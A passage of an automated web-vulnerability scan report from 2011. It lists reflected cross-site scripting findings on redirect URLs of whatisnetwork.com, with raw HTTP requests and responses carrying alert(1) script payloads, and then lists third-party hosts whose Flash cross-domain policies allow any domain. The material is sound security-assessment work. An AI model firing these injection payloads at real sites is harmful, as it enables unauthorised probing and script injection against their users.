GET /go/http:/www.myspace.com/Modules/PostTo/Pages/?47cad"><script>alert(1)</script>89acfc0411c=1 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:43 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:44 GMT
Location: http://www.myspace.com/Modules/PostTo/Pages/?47cad\"><script>alert(1)</script>89acfc0411c=1
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 874

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.myspace.com/Modules/PostTo/Pages/?47cad\"><script>alert(1)</script>89acfc0411c=1" />
...[SNIP]...

1.357. http://www.whatisnetwork.com/go/http:/www.squidoo.com/lensmaster/bookmark [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.squidoo.com/lensmaster/bookmark

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbc51"><script>alert(1)</script>892dc708f2c was submitted in the REST URL parameter 3. This input was echoed as dbc51\"><script>alert(1)</script>892dc708f2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.squidoo.comdbc51"><script>alert(1)</script>892dc708f2c/lensmaster/bookmark HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:35 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:36 GMT
Location: http://www.squidoo.comdbc51\"><script>alert(1)</script>892dc708f2c/lensmaster/bookmark
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 835

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.squidoo.comdbc51\"><script>alert(1)</script>892dc708f2c/lensmaster/bookmark" />
...[SNIP]...

1.358. http://www.whatisnetwork.com/go/http:/www.squidoo.com/lensmaster/bookmark [REST URL parameter 4] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.squidoo.com/lensmaster/bookmark

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e16e"><script>alert(1)</script>69a4568bd2 was submitted in the REST URL parameter 4. This input was echoed as 2e16e\"><script>alert(1)</script>69a4568bd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.squidoo.com/lensmaster2e16e"><script>alert(1)</script>69a4568bd2/bookmark HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:37 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:37 GMT
Location: http://www.squidoo.com/lensmaster2e16e\"><script>alert(1)</script>69a4568bd2/bookmark
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 833

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.squidoo.com/lensmaster2e16e\"><script>alert(1)</script>69a4568bd2/bookmark" />
...[SNIP]...

1.359. http://www.whatisnetwork.com/go/http:/www.squidoo.com/lensmaster/bookmark [REST URL parameter 5] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.squidoo.com/lensmaster/bookmark

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e38"><script>alert(1)</script>c24789dd2cd was submitted in the REST URL parameter 5. This input was echoed as 80e38\"><script>alert(1)</script>c24789dd2cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.squidoo.com/lensmaster/bookmark80e38"><script>alert(1)</script>c24789dd2cd HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:38 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:39 GMT
Location: http://www.squidoo.com/lensmaster/bookmark80e38\"><script>alert(1)</script>c24789dd2cd
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 835

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.squidoo.com/lensmaster/bookmark80e38\"><script>alert(1)</script>c24789dd2cd" />
...[SNIP]...

1.360. http://www.whatisnetwork.com/go/http:/www.squidoo.com/lensmaster/bookmark [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.squidoo.com/lensmaster/bookmark

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92572"><script>alert(1)</script>c8adfdc6d6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92572\"><script>alert(1)</script>c8adfdc6d6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.squidoo.com/lensmaster/bookmark?92572"><script>alert(1)</script>c8adfdc6d6a=1 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:22 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:22 GMT
Location: http://www.squidoo.com/lensmaster/bookmark?92572\"><script>alert(1)</script>c8adfdc6d6a=1
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 870

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.squidoo.com/lensmaster/bookmark?92572\"><script>alert(1)</script>c8adfdc6d6a=1" />
...[SNIP]...

1.361. http://www.whatisnetwork.com/go/http:/www.stumbleupon.com/submit [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.stumbleupon.com/submit

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6b30"><script>alert(1)</script>9ce6e77372e was submitted in the REST URL parameter 3. This input was echoed as b6b30\"><script>alert(1)</script>9ce6e77372e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.stumbleupon.comb6b30"><script>alert(1)</script>9ce6e77372e/submit HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:45 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:46 GMT
Location: http://www.stumbleupon.comb6b30\"><script>alert(1)</script>9ce6e77372e/submit
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 817

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.stumbleupon.comb6b30\"><script>alert(1)</script>9ce6e77372e/submit" />
...[SNIP]...

1.362. http://www.whatisnetwork.com/go/http:/www.stumbleupon.com/submit [REST URL parameter 4] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.stumbleupon.com/submit

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34023"><script>alert(1)</script>567d43b7e03 was submitted in the REST URL parameter 4. This input was echoed as 34023\"><script>alert(1)</script>567d43b7e03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.stumbleupon.com/submit34023"><script>alert(1)</script>567d43b7e03 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:46 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:47 GMT
Location: http://www.stumbleupon.com/submit34023\"><script>alert(1)</script>567d43b7e03
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 817

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.stumbleupon.com/submit34023\"><script>alert(1)</script>567d43b7e03" />
...[SNIP]...

1.363. http://www.whatisnetwork.com/go/http:/www.stumbleupon.com/submit [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.stumbleupon.com/submit

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53bea"><script>alert(1)</script>d5eba45f20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 53bea\"><script>alert(1)</script>d5eba45f20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.stumbleupon.com/submit?53bea"><script>alert(1)</script>d5eba45f20=1 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:37 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:38 GMT
Location: http://www.stumbleupon.com/submit?53bea\"><script>alert(1)</script>d5eba45f20=1
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 850

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.stumbleupon.com/submit?53bea\"><script>alert(1)</script>d5eba45f20=1" />
...[SNIP]...

1.364. http://www.whatisnetwork.com/go/https:/favorites.live.com/quickadd.aspx [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/https:/favorites.live.com/quickadd.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdc81"><script>alert(1)</script>1c324675a5c was submitted in the REST URL parameter 3. This input was echoed as fdc81\"><script>alert(1)</script>1c324675a5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/https:/favorites.live.comfdc81"><script>alert(1)</script>1c324675a5c/quickadd.aspx HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:53 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:54 GMT
Location: https://favorites.live.comfdc81\"><script>alert(1)</script>1c324675a5c/quickadd.aspx
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 831

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=https://favorites.live.comfdc81\"><script>alert(1)</script>1c324675a5c/quickadd.aspx" />
...[SNIP]...

1.365. http://www.whatisnetwork.com/go/https:/favorites.live.com/quickadd.aspx [REST URL parameter 4] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/https:/favorites.live.com/quickadd.aspx

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd3f8"><script>alert(1)</script>1de7673038a was submitted in the REST URL parameter 4. This input was echoed as cd3f8\"><script>alert(1)</script>1de7673038a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/https:/favorites.live.com/quickadd.aspxcd3f8"><script>alert(1)</script>1de7673038a HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:54 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:55 GMT
Location: https://favorites.live.com/quickadd.aspxcd3f8\"><script>alert(1)</script>1de7673038a
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 831

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=https://favorites.live.com/quickadd.aspxcd3f8\"><script>alert(1)</script>1de7673038a" />
...[SNIP]...

1.366. http://www.whatisnetwork.com/go/https:/favorites.live.com/quickadd.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/https:/favorites.live.com/quickadd.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0d5a"><script>alert(1)</script>cfed2475c79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0d5a\"><script>alert(1)</script>cfed2475c79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/https:/favorites.live.com/quickadd.aspx?a0d5a"><script>alert(1)</script>cfed2475c79=1 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:46 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:46 GMT
Location: https://favorites.live.com/quickadd.aspx?a0d5a\"><script>alert(1)</script>cfed2475c79=1
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 866

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=https://favorites.live.com/quickadd.aspx?a0d5a\"><script>alert(1)</script>cfed2475c79=1" />
...[SNIP]...

2. Flash cross-domain policy previous next
There are 57 instances of this issue:

http://133.xg4ken.com/crossdomain.xml
http://a.dlqm.net/crossdomain.xml
http://a.tribalfusion.com/crossdomain.xml
http://action.media6degrees.com/crossdomain.xml
http://ad-apac.doubleclick.net/crossdomain.xml
http://ad-emea.doubleclick.net/crossdomain.xml
http://ad.doubleclick.net/crossdomain.xml
http://amch.questionmarket.com/crossdomain.xml
http://ar.voicefive.com/crossdomain.xml
http://at.amgdgt.com/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://b.voicefive.com/crossdomain.xml
http://bp.specificclick.net/crossdomain.xml
http://bs.serving-sys.com/crossdomain.xml
http://cdn.i.haymarket.net.au/crossdomain.xml
http://cdn.ttgtmedia.com/crossdomain.xml
http://cdn.widgetserver.com/crossdomain.xml
http://clk.atdmt.com/crossdomain.xml
http://ds.serving-sys.com/crossdomain.xml
http://event.adxpose.com/crossdomain.xml
http://fls.doubleclick.net/crossdomain.xml
http://i.haymarket.net.au/crossdomain.xml
http://ib.adnxs.com/crossdomain.xml
http://idcs.interclick.com/crossdomain.xml
http://idgenterprise.112.2o7.net/crossdomain.xml
http://img.widgetbox.com/crossdomain.xml
http://kaplab.netmng.com/crossdomain.xml
http://kaspersky.ugc.bazaarvoice.com/crossdomain.xml
http://m.adnxs.com/crossdomain.xml
http://media.fastclick.net/crossdomain.xml
http://now.eloqua.com/crossdomain.xml
http://pixel.invitemedia.com/crossdomain.xml
http://pixel.mathtag.com/crossdomain.xml
http://pixel.quantserve.com/crossdomain.xml
http://pto.digitalriver.com/crossdomain.xml
http://r.turn.com/crossdomain.xml
http://s0.2mdn.net/crossdomain.xml
http://searchsecurity.techtarget.com/crossdomain.xml
http://secure-au.imrworldwide.com/crossdomain.xml
http://secure-us.imrworldwide.com/crossdomain.xml
http://spe.atdmt.com/crossdomain.xml
http://t.widgetserver.com/crossdomain.xml
http://tr1.kaspersky.com/crossdomain.xml
http://www.etracker.de/crossdomain.xml
http://www.widgetserver.com/crossdomain.xml
https://adwords.google.com/crossdomain.xml
http://api.demandbase.com/crossdomain.xml
http://disqus.com/crossdomain.xml
http://pagead2.googlesyndication.com/crossdomain.xml
http://wd.sharethis.com/crossdomain.xml
http://www.facebook.com/crossdomain.xml
http://www.spamfighter.com/crossdomain.xml
http://api.twitter.com/crossdomain.xml
https://api.twitter.com/crossdomain.xml
https://docs.google.com/crossdomain.xml
https://drh.img.digitalriver.com/crossdomain.xml
https://github.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

2.1. http://133.xg4ken.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://133.xg4ken.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 133.xg4ken.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 13:59:34 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 21 Dec 2009 22:59:19 GMT
ETag: "35800d-c6-47b450a15bfc0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

2.2. http://a.dlqm.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.dlqm.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: a.dlqm.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 13:59:38 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "2005439f-d1-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=120, max=960
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

2.3. http://a.tribalfusion.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

2.4. http://action.media6degrees.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://action.media6degrees.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: action.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"288-1307635301000"
Last-Modified: Thu, 09 Jun 2011 16:01:41 GMT
Content-Type: application/xml
Content-Length: 288
Date: Sun, 04 Sep 2011 12:18:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

2.5. http://ad-apac.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-apac.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-apac.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Sun, 04 Sep 2011 13:59:40 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

2.6. http://ad-emea.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Sun, 04 Sep 2011 13:59:42 GMT

<?xml version="1.0"?>
